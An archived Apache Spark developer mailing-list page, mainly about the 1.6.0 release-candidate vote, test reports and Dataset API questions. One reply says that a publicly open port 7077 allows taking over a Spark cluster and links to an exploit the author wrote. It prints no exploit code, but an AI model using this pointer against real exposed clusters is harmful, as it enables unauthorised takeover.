Re: security testing on spark ?

2015-12-18 Thread Akhil Das
If the port 7077 is open for public on your cluster, that's all you need to
take over the cluster. You can read a bit about it here
https://www.sigmoid.com/securing-apache-spark-cluster/

You can also look at this small exploit I wrote
https://www.exploit-db.com/exploits/36562/

Thanks
Best Regards

On Wed, Dec 16, 2015 at 6:46 AM, Judy Nash 
wrote:

> Hi all,
>
>
>
> Does anyone know of any effort from the community on security testing
> spark clusters.
>
> I.e.
>
> Static source code analysis to find security flaws
>
> Penetration testing to identify ways to compromise spark cluster
>
> Fuzzing to crash spark
>
>
>
> Thanks,
>
> Judy
>
>
>


Re: Spark basicOperators

2015-12-18 Thread Akhil Das
You can pretty much measure it from the Event timeline listed in the driver
ui, You can click on jobs/tasks and get the time that it took for each of
it from there.

Thanks
Best Regards

On Thu, Dec 17, 2015 at 7:27 AM, sara mustafa 
wrote:

> Hi,
>
> The class org.apache.spark.sql.execution.basicOperators.scala contains the
> implementation of multiple operators, how could I measure the execution
> time
> of any operator?
>
> thanks,
>
>
>
> --
> View this message in context:
> http://apache-spark-developers-list.1001551.n3.nabble.com/Spark-basicOperators-tp15672.html
> Sent from the Apache Spark Developers List mailing list archive at
> Nabble.com.
>
> -
> To unsubscribe, e-mail: dev-unsubscr...@spark.apache.org
> For additional commands, e-mail: dev-h...@spark.apache.org
>
>


Re: [VOTE] Release Apache Spark 1.6.0 (RC3)

2015-12-18 Thread Daniel Darabos
+1 (non-binding)

It passes our tests after we registered 6 new classes with Kryo:


kryo.register(classOf[org.apache.spark.sql.catalyst.expressions.UnsafeRow])
kryo.register(classOf[Array[org.apache.spark.mllib.tree.model.Split]])

kryo.register(Class.forName("org.apache.spark.mllib.tree.model.Bin"))
kryo.register(Class.forName("[Lorg.apache.spark.mllib.tree.model.Bin;"))

kryo.register(Class.forName("org.apache.spark.mllib.tree.model.DummyLowSplit"))

kryo.register(Class.forName("org.apache.spark.mllib.tree.model.DummyHighSplit"))

It also spams "Managed memory leak detected; size = 15735058 bytes, TID =
847" for almost every task. I haven't yet figured out why.


On Fri, Dec 18, 2015 at 6:45 AM, Krishna Sankar  wrote:

> +1 (non-binding, of course)
>
> 1. Compiled OSX 10.10 (Yosemite) OK Total time: 29:32 min
>  mvn clean package -Pyarn -Phadoop-2.6 -DskipTests
> 2. Tested pyspark, mllib (iPython 4.0)
> 2.0 Spark version is 1.6.0
> 2.1. statistics (min,max,mean,Pearson,Spearman) OK
> 2.2. Linear/Ridge/Laso Regression OK
> 2.3. Decision Tree, Naive Bayes OK
> 2.4. KMeans OK
>Center And Scale OK
> 2.5. RDD operations OK
>   State of the Union Texts - MapReduce, Filter,sortByKey (word count)
> 2.6. Recommendation (Movielens medium dataset ~1 M ratings) OK
>Model evaluation/optimization (rank, numIter, lambda) with
> itertools OK
> 3. Scala - MLlib
> 3.1. statistics (min,max,mean,Pearson,Spearman) OK
> 3.2. LinearRegressionWithSGD OK
> 3.3. Decision Tree OK
> 3.4. KMeans OK
> 3.5. Recommendation (Movielens medium dataset ~1 M ratings) OK
> 3.6. saveAsParquetFile OK
> 3.7. Read and verify the 4.3 save(above) - sqlContext.parquetFile,
> registerTempTable, sql OK
> 3.8. result = sqlContext.sql("SELECT
> OrderDetails.OrderID,ShipCountry,UnitPrice,Qty,Discount FROM Orders INNER
> JOIN OrderDetails ON Orders.OrderID = OrderDetails.OrderID") OK
> 4.0. Spark SQL from Python OK
> 4.1. result = sqlContext.sql("SELECT * from people WHERE State = 'WA'") OK
> 5.0. Packages
> 5.1. com.databricks.spark.csv - read/write OK (--packages
> com.databricks:spark-csv_2.10:1.3.0)
> 6.0. DataFrames
> 6.1. cast,dtypes OK
> 6.2. groupBy,avg,crosstab,corr,isNull,na.drop OK
> 6.3. All joins,sql,set operations,udf OK
>
> Cheers & Good work guys
> 
>
> On Wed, Dec 16, 2015 at 1:32 PM, Michael Armbrust 
> wrote:
>
>> Please vote on releasing the following candidate as Apache Spark version
>> 1.6.0!
>>
>> The vote is open until Saturday, December 19, 2015 at 18:00 UTC and
>> passes if a majority of at least 3 +1 PMC votes are cast.
>>
>> [ ] +1 Release this package as Apache Spark 1.6.0
>> [ ] -1 Do not release this package because ...
>>
>> To learn more about Apache Spark, please see http://spark.apache.org/
>>
>> The tag to be voted on is *v1.6.0-rc3
>> (168c89e07c51fa24b0bb88582c739cec0acb44d7)
>> *
>>
>> The release files, including signatures, digests, etc. can be found at:
>> http://people.apache.org/~pwendell/spark-releases/spark-1.6.0-rc3-bin/
>>
>> Release artifacts are signed with the following key:
>> https://people.apache.org/keys/committer/pwendell.asc
>>
>> The staging repository for this release can be found at:
>> https://repository.apache.org/content/repositories/orgapachespark-1174/
>>
>> The test repository (versioned as v1.6.0-rc3) for this release can be
>> found at:
>> https://repository.apache.org/content/repositories/orgapachespark-1173/
>>
>> The documentation corresponding to this release can be found at:
>> http://people.apache.org/~pwendell/spark-releases/spark-1.6.0-rc3-docs/
>>
>> ===
>> == How can I help test this release? ==
>> ===
>> If you are a Spark user, you can help us test this release by taking an
>> existing Spark workload and running on this release candidate, then
>> reporting any regressions.
>>
>> 
>> == What justifies a -1 vote for this release? ==
>> 
>> This vote is happening towards the end of the 1.6 QA period, so -1 votes
>> should only occur for significant regressions from 1.5. Bugs already
>> present in 1.5, minor regressions, or bugs related to new features will not
>> block this release.
>>
>> ===
>> == What should happen to JIRA tickets still targeting 1.6.0? ==
>> ===
>> 1. It is OK for documentation patches to target 1.6.0 and still go into
>> branch-1.6, since documentations will be published separately from the
>> release.
>> 2. New features for non-alpha-modules should target 1.7+.
>> 3. Non-blocker bug fixes should target 1.6.1 or 1.7.0, or drop the target
>> version.
>>
>>
>> ==
>> == Major changes to help you focus 

Re: [VOTE] Release Apache Spark 1.6.0 (RC3)

2015-12-18 Thread Sean Owen
For me, mostly the same as before: tests are mostly passing, but I can
never get the docker tests to pass. If anyone knows a special profile
or package that needs to be enabled, I can try that and/or
fix/document it. Just wondering if it's me.

I'm on Java 7 + Ubuntu 15.10, with -Pyarn -Phive -Phive-thriftserver
-Phadoop-2.6

On Wed, Dec 16, 2015 at 9:32 PM, Michael Armbrust
 wrote:
> Please vote on releasing the following candidate as Apache Spark version
> 1.6.0!
>
> The vote is open until Saturday, December 19, 2015 at 18:00 UTC and passes
> if a majority of at least 3 +1 PMC votes are cast.
>
> [ ] +1 Release this package as Apache Spark 1.6.0
> [ ] -1 Do not release this package because ...
>
> To learn more about Apache Spark, please see http://spark.apache.org/
>
> The tag to be voted on is v1.6.0-rc3
> (168c89e07c51fa24b0bb88582c739cec0acb44d7)
>
> The release files, including signatures, digests, etc. can be found at:
> http://people.apache.org/~pwendell/spark-releases/spark-1.6.0-rc3-bin/
>
> Release artifacts are signed with the following key:
> https://people.apache.org/keys/committer/pwendell.asc
>
> The staging repository for this release can be found at:
> https://repository.apache.org/content/repositories/orgapachespark-1174/
>
> The test repository (versioned as v1.6.0-rc3) for this release can be found
> at:
> https://repository.apache.org/content/repositories/orgapachespark-1173/
>
> The documentation corresponding to this release can be found at:
> http://people.apache.org/~pwendell/spark-releases/spark-1.6.0-rc3-docs/
>
> ===
> == How can I help test this release? ==
> ===
> If you are a Spark user, you can help us test this release by taking an
> existing Spark workload and running on this release candidate, then
> reporting any regressions.
>
> 
> == What justifies a -1 vote for this release? ==
> 
> This vote is happening towards the end of the 1.6 QA period, so -1 votes
> should only occur for significant regressions from 1.5. Bugs already present
> in 1.5, minor regressions, or bugs related to new features will not block
> this release.
>
> ===
> == What should happen to JIRA tickets still targeting 1.6.0? ==
> ===
> 1. It is OK for documentation patches to target 1.6.0 and still go into
> branch-1.6, since documentations will be published separately from the
> release.
> 2. New features for non-alpha-modules should target 1.7+.
> 3. Non-blocker bug fixes should target 1.6.1 or 1.7.0, or drop the target
> version.
>
>
> ==
> == Major changes to help you focus your testing ==
> ==
>
> Notable changes since 1.6 RC2
>
>
> - SPARK_VERSION has been set correctly
> - SPARK-12199 ML Docs are publishing correctly
> - SPARK-12345 Mesos cluster mode has been fixed
>
> Notable changes since 1.6 RC1
>
> Spark Streaming
>
> SPARK-2629  trackStateByKey has been renamed to mapWithState
>
> Spark SQL
>
> SPARK-12165 SPARK-12189 Fix bugs in eviction of storage memory by execution.
> SPARK-12258 correct passing null into ScalaUDF
>
> Notable Features Since 1.5
>
> Spark SQL
>
> SPARK-11787 Parquet Performance - Improve Parquet scan performance when
> using flat schemas.
> SPARK-10810 Session Management - Isolated devault database (i.e USE mydb)
> even on shared clusters.
> SPARK-  Dataset API - A type-safe API (similar to RDDs) that performs
> many operations on serialized binary data and code generation (i.e. Project
> Tungsten).
> SPARK-1 Unified Memory Management - Shared memory for execution and
> caching instead of exclusive division of the regions.
> SPARK-11197 SQL Queries on Files - Concise syntax for running SQL queries
> over files of any supported format without registering a table.
> SPARK-11745 Reading non-standard JSON files - Added options to read
> non-standard JSON files (e.g. single-quotes, unquoted attributes)
> SPARK-10412 Per-operator Metrics for SQL Execution - Display statistics on a
> peroperator basis for memory usage and spilled data size.
> SPARK-11329 Star (*) expansion for StructTypes - Makes it easier to nest and
> unest arbitrary numbers of columns
> SPARK-10917, SPARK-11149 In-memory Columnar Cache Performance - Significant
> (up to 14x) speed up when caching data that contains complex types in
> DataFrames or SQL.
> SPARK-1 Fast null-safe joins - Joins using null-safe equality (<=>) will
> now execute using SortMergeJoin instead of computing a cartisian product.
> SPARK-11389 SQL Execution Using Off-Heap Memory - Support for configuring
> query execution to occur using off-heap memory to avoid GC overhead
> SPARK-10978 Datasource API Avoid Double Filter 

Re: [VOTE] Release Apache Spark 1.6.0 (RC3)

2015-12-18 Thread Tom Graves
+1.  Ran some regression tests on Spark on Yarn (hadoop 2.6 and 2.7).
Tom 


On Wednesday, December 16, 2015 3:32 PM, Michael Armbrust 
 wrote:
 

 Please vote on releasing the following candidate as Apache Spark version 1.6.0!
The vote is open until Saturday, December 19, 2015 at 18:00 UTC and passes if a 
majority of at least 3 +1 PMC votes are cast.

[ ] +1 Release this package as Apache Spark 1.6.0[ ] -1 Do not release this 
package because ...
To learn more about Apache Spark, please see http://spark.apache.org/
The tag to be voted on is v1.6.0-rc3 (168c89e07c51fa24b0bb88582c739cec0acb44d7)
The release files, including signatures, digests, etc. can be found 
at:http://people.apache.org/~pwendell/spark-releases/spark-1.6.0-rc3-bin/
Release artifacts are signed with the following 
key:https://people.apache.org/keys/committer/pwendell.asc
The staging repository for this release can be found 
at:https://repository.apache.org/content/repositories/orgapachespark-1174/
The test repository (versioned as v1.6.0-rc3) for this release can be found 
at:https://repository.apache.org/content/repositories/orgapachespark-1173/
The documentation corresponding to this release can be found 
at:http://people.apache.org/~pwendell/spark-releases/spark-1.6.0-rc3-docs/
= How can I help test this release? 
=If you are a Spark user, you can help 
us test this release by taking an existing Spark workload and running on this 
release candidate, then reporting any regressions.
== What justifies a -1 vote for 
this release? ==This vote is 
happening towards the end of the 1.6 QA period, so -1 votes should only occur 
for significant regressions from 1.5. Bugs already present in 1.5, minor 
regressions, or bugs related to new features will not block this release.
= What should 
happen to JIRA tickets still targeting 1.6.0? 
=1. It is OK 
for documentation patches to target 1.6.0 and still go into branch-1.6, since 
documentations will be published separately from the release.2. New features 
for non-alpha-modules should target 1.7+.3. Non-blocker bug fixes should target 
1.6.1 or 1.7.0, or drop the target version.

 Major changes to help you 
focus your testing 

Notable changes since 1.6 RC2

- SPARK_VERSION has been set correctly
- SPARK-12199 ML Docs are publishing correctly
- SPARK-12345 Mesos cluster mode has been fixed

Notable changes since 1.6 RC1


Spark Streaming
   
   - SPARK-2629  trackStateByKey has been renamed to mapWithState

Spark SQL
   
   - SPARK-12165 SPARK-12189 Fix bugs in eviction of storage memory by 
execution.
   - SPARK-12258 correct passing null into ScalaUDF

Notable Features Since 1.5

Spark SQL
   
   - SPARK-11787 Parquet Performance - Improve Parquet scan performance when 
using flat schemas.
   - SPARK-10810 Session Management - Isolated devault database (i.e USE mydb) 
even on shared clusters.
   - SPARK-  Dataset API - A type-safe API (similar to RDDs) that performs 
many operations on serialized binary data and code generation (i.e. Project 
Tungsten).
   - SPARK-1 Unified Memory Management - Shared memory for execution and 
caching instead of exclusive division of the regions.
   - SPARK-11197 SQL Queries on Files - Concise syntax for running SQL queries 
over files of any supported format without registering a table.
   - SPARK-11745 Reading non-standard JSON files - Added options to read 
non-standard JSON files (e.g. single-quotes, unquoted attributes)
   - SPARK-10412 Per-operator Metrics for SQL Execution - Display statistics on 
a peroperator basis for memory usage and spilled data size.
   - SPARK-11329 Star (*) expansion for StructTypes - Makes it easier to nest 
and unest arbitrary numbers of columns
   - SPARK-10917, SPARK-11149 In-memory Columnar Cache Performance - 
Significant (up to 14x) speed up when caching data that contains complex types 
in DataFrames or SQL.
   - SPARK-1 Fast null-safe joins - Joins using null-safe equality (<=>) 
will now execute using SortMergeJoin instead of computing a cartisian product.
   - SPARK-11389 SQL Execution Using Off-Heap Memory - Support for configuring 
query execution to occur using off-heap memory to avoid GC overhead
   - SPARK-10978 Datasource API Avoid Double Filter - When implemeting a 
datasource with filter pushdown, developers can now tell Spark SQL to avoid 
double evaluating a pushed-down filter.
   - SPARK-4849  Advanced Layout of Cached Data - storing partitioning and 
ordering schemes in In-memory table scan, and adding distributeBy and localSort 
to DF API
   - SPARK-9858  Adaptive 

Re: [VOTE] Release Apache Spark 1.6.0 (RC3)

2015-12-18 Thread Sean Owen
Yes that's what I mean. If they're not quite working, let's disable
them, but first, we have to rule out that I'm not just missing some
requirement.

Functionally, it's not worth blocking the release. It seems like bad
form to release with tests that always fail for a non-trivial number
of users, but we have to establish that. If it's something with an
easy fix (or needs disabling) and another RC needs to be baked, might
be worth including.

Logs coming offline

On Fri, Dec 18, 2015 at 5:30 PM, Mark Grover  wrote:
> Sean,
> Are you referring to docker integration tests? If so, they were disabled for
> majority of the release and I recently worked on it (SPARK-11796) and once
> it got committed, the tests were re-enabled in Spark builds. I am not sure
> what OSs the test builds use, but it should be passing there too.
>
> During my work, I tested on Ubuntu Precise and they worked. If you could
> share the logs with me offline, I could take a look. Alternatively, I can
> try to see if I can get Ubuntu 15 instance. However, given the history of
> these tests, I personally don't think it makes sense to block the release
> based on them not running on Ubuntu 15.
>
> On Fri, Dec 18, 2015 at 9:22 AM, Sean Owen  wrote:
>>
>> For me, mostly the same as before: tests are mostly passing, but I can
>> never get the docker tests to pass. If anyone knows a special profile
>> or package that needs to be enabled, I can try that and/or
>> fix/document it. Just wondering if it's me.
>>
>> I'm on Java 7 + Ubuntu 15.10, with -Pyarn -Phive -Phive-thriftserver
>> -Phadoop-2.6
>>
>> On Wed, Dec 16, 2015 at 9:32 PM, Michael Armbrust
>>  wrote:
>> > Please vote on releasing the following candidate as Apache Spark version
>> > 1.6.0!
>> >
>> > The vote is open until Saturday, December 19, 2015 at 18:00 UTC and
>> > passes
>> > if a majority of at least 3 +1 PMC votes are cast.
>> >
>> > [ ] +1 Release this package as Apache Spark 1.6.0
>> > [ ] -1 Do not release this package because ...
>> >
>> > To learn more about Apache Spark, please see http://spark.apache.org/
>> >
>> > The tag to be voted on is v1.6.0-rc3
>> > (168c89e07c51fa24b0bb88582c739cec0acb44d7)
>> >
>> > The release files, including signatures, digests, etc. can be found at:
>> > http://people.apache.org/~pwendell/spark-releases/spark-1.6.0-rc3-bin/
>> >
>> > Release artifacts are signed with the following key:
>> > https://people.apache.org/keys/committer/pwendell.asc
>> >
>> > The staging repository for this release can be found at:
>> > https://repository.apache.org/content/repositories/orgapachespark-1174/
>> >
>> > The test repository (versioned as v1.6.0-rc3) for this release can be
>> > found
>> > at:
>> > https://repository.apache.org/content/repositories/orgapachespark-1173/
>> >
>> > The documentation corresponding to this release can be found at:
>> > http://people.apache.org/~pwendell/spark-releases/spark-1.6.0-rc3-docs/
>> >
>> > ===
>> > == How can I help test this release? ==
>> > ===
>> > If you are a Spark user, you can help us test this release by taking an
>> > existing Spark workload and running on this release candidate, then
>> > reporting any regressions.
>> >
>> > 
>> > == What justifies a -1 vote for this release? ==
>> > 
>> > This vote is happening towards the end of the 1.6 QA period, so -1 votes
>> > should only occur for significant regressions from 1.5. Bugs already
>> > present
>> > in 1.5, minor regressions, or bugs related to new features will not
>> > block
>> > this release.
>> >
>> > ===
>> > == What should happen to JIRA tickets still targeting 1.6.0? ==
>> > ===
>> > 1. It is OK for documentation patches to target 1.6.0 and still go into
>> > branch-1.6, since documentations will be published separately from the
>> > release.
>> > 2. New features for non-alpha-modules should target 1.7+.
>> > 3. Non-blocker bug fixes should target 1.6.1 or 1.7.0, or drop the
>> > target
>> > version.
>> >
>> >
>> > ==
>> > == Major changes to help you focus your testing ==
>> > ==
>> >
>> > Notable changes since 1.6 RC2
>> >
>> >
>> > - SPARK_VERSION has been set correctly
>> > - SPARK-12199 ML Docs are publishing correctly
>> > - SPARK-12345 Mesos cluster mode has been fixed
>> >
>> > Notable changes since 1.6 RC1
>> >
>> > Spark Streaming
>> >
>> > SPARK-2629  trackStateByKey has been renamed to mapWithState
>> >
>> > Spark SQL
>> >
>> > SPARK-12165 SPARK-12189 Fix bugs in eviction of storage memory by
>> > execution.
>> > SPARK-12258 correct passing null into ScalaUDF
>> >
>> > Notable Features Since 1.5

Re: [VOTE] Release Apache Spark 1.6.0 (RC3)

2015-12-18 Thread Mark Grover
Thanks Sean for sending me the logs offline.

Turns out the tests are failing again, for reasons unrelated to Spark. I
have filed https://issues.apache.org/jira/browse/SPARK-12426 for that with
some details. In the meanwhile, I agree with Sean, these tests should be
disabled. And, again, I don't think this failures warrants blocking the
release.

Mark

On Fri, Dec 18, 2015 at 9:32 AM, Sean Owen  wrote:

> Yes that's what I mean. If they're not quite working, let's disable
> them, but first, we have to rule out that I'm not just missing some
> requirement.
>
> Functionally, it's not worth blocking the release. It seems like bad
> form to release with tests that always fail for a non-trivial number
> of users, but we have to establish that. If it's something with an
> easy fix (or needs disabling) and another RC needs to be baked, might
> be worth including.
>
> Logs coming offline
>
> On Fri, Dec 18, 2015 at 5:30 PM, Mark Grover  wrote:
> > Sean,
> > Are you referring to docker integration tests? If so, they were disabled
> for
> > majority of the release and I recently worked on it (SPARK-11796) and
> once
> > it got committed, the tests were re-enabled in Spark builds. I am not
> sure
> > what OSs the test builds use, but it should be passing there too.
> >
> > During my work, I tested on Ubuntu Precise and they worked. If you could
> > share the logs with me offline, I could take a look. Alternatively, I can
> > try to see if I can get Ubuntu 15 instance. However, given the history of
> > these tests, I personally don't think it makes sense to block the release
> > based on them not running on Ubuntu 15.
> >
> > On Fri, Dec 18, 2015 at 9:22 AM, Sean Owen  wrote:
> >>
> >> For me, mostly the same as before: tests are mostly passing, but I can
> >> never get the docker tests to pass. If anyone knows a special profile
> >> or package that needs to be enabled, I can try that and/or
> >> fix/document it. Just wondering if it's me.
> >>
> >> I'm on Java 7 + Ubuntu 15.10, with -Pyarn -Phive -Phive-thriftserver
> >> -Phadoop-2.6
> >>
> >> On Wed, Dec 16, 2015 at 9:32 PM, Michael Armbrust
> >>  wrote:
> >> > Please vote on releasing the following candidate as Apache Spark
> version
> >> > 1.6.0!
> >> >
> >> > The vote is open until Saturday, December 19, 2015 at 18:00 UTC and
> >> > passes
> >> > if a majority of at least 3 +1 PMC votes are cast.
> >> >
> >> > [ ] +1 Release this package as Apache Spark 1.6.0
> >> > [ ] -1 Do not release this package because ...
> >> >
> >> > To learn more about Apache Spark, please see http://spark.apache.org/
> >> >
> >> > The tag to be voted on is v1.6.0-rc3
> >> > (168c89e07c51fa24b0bb88582c739cec0acb44d7)
> >> >
> >> > The release files, including signatures, digests, etc. can be found
> at:
> >> >
> http://people.apache.org/~pwendell/spark-releases/spark-1.6.0-rc3-bin/
> >> >
> >> > Release artifacts are signed with the following key:
> >> > https://people.apache.org/keys/committer/pwendell.asc
> >> >
> >> > The staging repository for this release can be found at:
> >> >
> https://repository.apache.org/content/repositories/orgapachespark-1174/
> >> >
> >> > The test repository (versioned as v1.6.0-rc3) for this release can be
> >> > found
> >> > at:
> >> >
> https://repository.apache.org/content/repositories/orgapachespark-1173/
> >> >
> >> > The documentation corresponding to this release can be found at:
> >> >
> http://people.apache.org/~pwendell/spark-releases/spark-1.6.0-rc3-docs/
> >> >
> >> > ===
> >> > == How can I help test this release? ==
> >> > ===
> >> > If you are a Spark user, you can help us test this release by taking
> an
> >> > existing Spark workload and running on this release candidate, then
> >> > reporting any regressions.
> >> >
> >> > 
> >> > == What justifies a -1 vote for this release? ==
> >> > 
> >> > This vote is happening towards the end of the 1.6 QA period, so -1
> votes
> >> > should only occur for significant regressions from 1.5. Bugs already
> >> > present
> >> > in 1.5, minor regressions, or bugs related to new features will not
> >> > block
> >> > this release.
> >> >
> >> > ===
> >> > == What should happen to JIRA tickets still targeting 1.6.0? ==
> >> > ===
> >> > 1. It is OK for documentation patches to target 1.6.0 and still go
> into
> >> > branch-1.6, since documentations will be published separately from the
> >> > release.
> >> > 2. New features for non-alpha-modules should target 1.7+.
> >> > 3. Non-blocker bug fixes should target 1.6.1 or 1.7.0, or drop the
> >> > target
> >> > version.
> >> >
> >> >
> >> > ==
> >> 

Is there any way to select columns of Dataset in addition to the combination of `expr` and `as`?

2015-12-18 Thread Yu Ishikawa
Hi all, 

I have two questions about selecting columns of Dataset.
First, could you tell me know if there is any way to select TypedColumn
columns in addition to the combination of `expr` and `as`?
Second, how can we alias such a `expr("name").as[String]` Column?

I tried to select a column of Dataset like DataFrame.
However, I couldn't do that.

```
case class Person(id: Int, name: String)
val df = sc.parallelize(Seq((1, "Bob"), (2, "Tom"))).toDF("id", "name")
val ds = df.as[Person]

ds.select(expr("name").as[String]).show
+-+
|value|
+-+
|  Bob|
|  Tom|
+-+

ds.select('id).show
:34: error: type mismatch;
found   : Symbol
required: org.apache.spark.sql.TypedColumn[Person,?]
  ds.select('id).show')

ds.select($"id").show
:34: error: type mismatch;
found   : org.apache.spark.sql.ColumnName
required: org.apache.spark.sql.TypedColumn[Person,?]
  ds.select($"id").show

ds.select(ds("id")).show
:34: error: org.apache.spark.sql.Dataset[Person] does not take
parameters
  ds.select(ds("id")).show

ds.select("id").show
:34: error: type mismatch;
found   : String("id")
required: org.apache.spark.sql.TypedColumn[Person,?]
  ds.select("id").show
```

Best,
Yu



-
-- Yu Ishikawa
--
View this message in context: 
http://apache-spark-developers-list.1001551.n3.nabble.com/Is-there-any-way-to-select-columns-of-Dataset-in-addition-to-the-combination-of-expr-and-as-tp15713.html
Sent from the Apache Spark Developers List mailing list archive at Nabble.com.

-
To unsubscribe, e-mail: dev-unsubscr...@spark.apache.org
For additional commands, e-mail: dev-h...@spark.apache.org



Re: [VOTE] Release Apache Spark 1.6.0 (RC3)

2015-12-18 Thread Marcelo Vanzin
+1 (non-binding)

Tests the without-hadoop binaries (so didn't run Hive-related tests)
with a test batch including standalone / client, yarn / client and
cluster, including core, mllib and streaming (flume and kafka).

On Wed, Dec 16, 2015 at 1:32 PM, Michael Armbrust
 wrote:
> Please vote on releasing the following candidate as Apache Spark version
> 1.6.0!
>
> The vote is open until Saturday, December 19, 2015 at 18:00 UTC and passes
> if a majority of at least 3 +1 PMC votes are cast.
>
> [ ] +1 Release this package as Apache Spark 1.6.0
> [ ] -1 Do not release this package because ...
>
> To learn more about Apache Spark, please see http://spark.apache.org/
>
> The tag to be voted on is v1.6.0-rc3
> (168c89e07c51fa24b0bb88582c739cec0acb44d7)
>
> The release files, including signatures, digests, etc. can be found at:
> http://people.apache.org/~pwendell/spark-releases/spark-1.6.0-rc3-bin/
>
> Release artifacts are signed with the following key:
> https://people.apache.org/keys/committer/pwendell.asc
>
> The staging repository for this release can be found at:
> https://repository.apache.org/content/repositories/orgapachespark-1174/
>
> The test repository (versioned as v1.6.0-rc3) for this release can be found
> at:
> https://repository.apache.org/content/repositories/orgapachespark-1173/
>
> The documentation corresponding to this release can be found at:
> http://people.apache.org/~pwendell/spark-releases/spark-1.6.0-rc3-docs/
>
> ===
> == How can I help test this release? ==
> ===
> If you are a Spark user, you can help us test this release by taking an
> existing Spark workload and running on this release candidate, then
> reporting any regressions.
>
> 
> == What justifies a -1 vote for this release? ==
> 
> This vote is happening towards the end of the 1.6 QA period, so -1 votes
> should only occur for significant regressions from 1.5. Bugs already present
> in 1.5, minor regressions, or bugs related to new features will not block
> this release.
>
> ===
> == What should happen to JIRA tickets still targeting 1.6.0? ==
> ===
> 1. It is OK for documentation patches to target 1.6.0 and still go into
> branch-1.6, since documentations will be published separately from the
> release.
> 2. New features for non-alpha-modules should target 1.7+.
> 3. Non-blocker bug fixes should target 1.6.1 or 1.7.0, or drop the target
> version.
>
>
> ==
> == Major changes to help you focus your testing ==
> ==
>
> Notable changes since 1.6 RC2
>
>
> - SPARK_VERSION has been set correctly
> - SPARK-12199 ML Docs are publishing correctly
> - SPARK-12345 Mesos cluster mode has been fixed
>
> Notable changes since 1.6 RC1
>
> Spark Streaming
>
> SPARK-2629  trackStateByKey has been renamed to mapWithState
>
> Spark SQL
>
> SPARK-12165 SPARK-12189 Fix bugs in eviction of storage memory by execution.
> SPARK-12258 correct passing null into ScalaUDF
>
> Notable Features Since 1.5
>
> Spark SQL
>
> SPARK-11787 Parquet Performance - Improve Parquet scan performance when
> using flat schemas.
> SPARK-10810 Session Management - Isolated devault database (i.e USE mydb)
> even on shared clusters.
> SPARK-  Dataset API - A type-safe API (similar to RDDs) that performs
> many operations on serialized binary data and code generation (i.e. Project
> Tungsten).
> SPARK-1 Unified Memory Management - Shared memory for execution and
> caching instead of exclusive division of the regions.
> SPARK-11197 SQL Queries on Files - Concise syntax for running SQL queries
> over files of any supported format without registering a table.
> SPARK-11745 Reading non-standard JSON files - Added options to read
> non-standard JSON files (e.g. single-quotes, unquoted attributes)
> SPARK-10412 Per-operator Metrics for SQL Execution - Display statistics on a
> peroperator basis for memory usage and spilled data size.
> SPARK-11329 Star (*) expansion for StructTypes - Makes it easier to nest and
> unest arbitrary numbers of columns
> SPARK-10917, SPARK-11149 In-memory Columnar Cache Performance - Significant
> (up to 14x) speed up when caching data that contains complex types in
> DataFrames or SQL.
> SPARK-1 Fast null-safe joins - Joins using null-safe equality (<=>) will
> now execute using SortMergeJoin instead of computing a cartisian product.
> SPARK-11389 SQL Execution Using Off-Heap Memory - Support for configuring
> query execution to occur using off-heap memory to avoid GC overhead
> SPARK-10978 Datasource API Avoid Double Filter - When implemeting a
> datasource with filter pushdown, developers can now tell Spark SQL to avoid
> double 

Re: [VOTE] Release Apache Spark 1.6.0 (RC3)

2015-12-18 Thread Denny Lee
+1 (non-binding)

Tested a number of tests surrounding DataFrames, Datasets, and ML.


On Wed, Dec 16, 2015 at 1:32 PM Michael Armbrust 
wrote:

> Please vote on releasing the following candidate as Apache Spark version
> 1.6.0!
>
> The vote is open until Saturday, December 19, 2015 at 18:00 UTC and
> passes if a majority of at least 3 +1 PMC votes are cast.
>
> [ ] +1 Release this package as Apache Spark 1.6.0
> [ ] -1 Do not release this package because ...
>
> To learn more about Apache Spark, please see http://spark.apache.org/
>
> The tag to be voted on is *v1.6.0-rc3
> (168c89e07c51fa24b0bb88582c739cec0acb44d7)
> *
>
> The release files, including signatures, digests, etc. can be found at:
> http://people.apache.org/~pwendell/spark-releases/spark-1.6.0-rc3-bin/
>
> Release artifacts are signed with the following key:
> https://people.apache.org/keys/committer/pwendell.asc
>
> The staging repository for this release can be found at:
> https://repository.apache.org/content/repositories/orgapachespark-1174/
>
> The test repository (versioned as v1.6.0-rc3) for this release can be
> found at:
> https://repository.apache.org/content/repositories/orgapachespark-1173/
>
> The documentation corresponding to this release can be found at:
> http://people.apache.org/~pwendell/spark-releases/spark-1.6.0-rc3-docs/
>
> ===
> == How can I help test this release? ==
> ===
> If you are a Spark user, you can help us test this release by taking an
> existing Spark workload and running on this release candidate, then
> reporting any regressions.
>
> 
> == What justifies a -1 vote for this release? ==
> 
> This vote is happening towards the end of the 1.6 QA period, so -1 votes
> should only occur for significant regressions from 1.5. Bugs already
> present in 1.5, minor regressions, or bugs related to new features will not
> block this release.
>
> ===
> == What should happen to JIRA tickets still targeting 1.6.0? ==
> ===
> 1. It is OK for documentation patches to target 1.6.0 and still go into
> branch-1.6, since documentations will be published separately from the
> release.
> 2. New features for non-alpha-modules should target 1.7+.
> 3. Non-blocker bug fixes should target 1.6.1 or 1.7.0, or drop the target
> version.
>
>
> ==
> == Major changes to help you focus your testing ==
> ==
>
> Notable changes since 1.6 RC2
> - SPARK_VERSION has been set correctly
> - SPARK-12199 ML Docs are publishing correctly
> - SPARK-12345 Mesos cluster mode has been fixed
>
> Notable changes since 1.6 RC1
> Spark Streaming
>
>- SPARK-2629  
>trackStateByKey has been renamed to mapWithState
>
> Spark SQL
>
>- SPARK-12165 
>SPARK-12189  Fix
>bugs in eviction of storage memory by execution.
>- SPARK-12258  correct
>passing null into ScalaUDF
>
> Notable Features Since 1.5Spark SQL
>
>- SPARK-11787  Parquet
>Performance - Improve Parquet scan performance when using flat schemas.
>- SPARK-10810 
>Session Management - Isolated devault database (i.e USE mydb) even on
>shared clusters.
>- SPARK-   Dataset
>API - A type-safe API (similar to RDDs) that performs many operations
>on serialized binary data and code generation (i.e. Project Tungsten).
>- SPARK-1  Unified
>Memory Management - Shared memory for execution and caching instead of
>exclusive division of the regions.
>- SPARK-11197  SQL
>Queries on Files - Concise syntax for running SQL queries over files
>of any supported format without registering a table.
>- SPARK-11745  Reading
>non-standard JSON files - Added options to read non-standard JSON
>files (e.g. single-quotes, unquoted attributes)
>- SPARK-10412  
> Per-operator
>Metrics for SQL Execution - Display statistics on a peroperator basis
>for memory usage and spilled data size.
>- SPARK-11329  Star
>(*) expansion for StructTypes - Makes it easier to nest and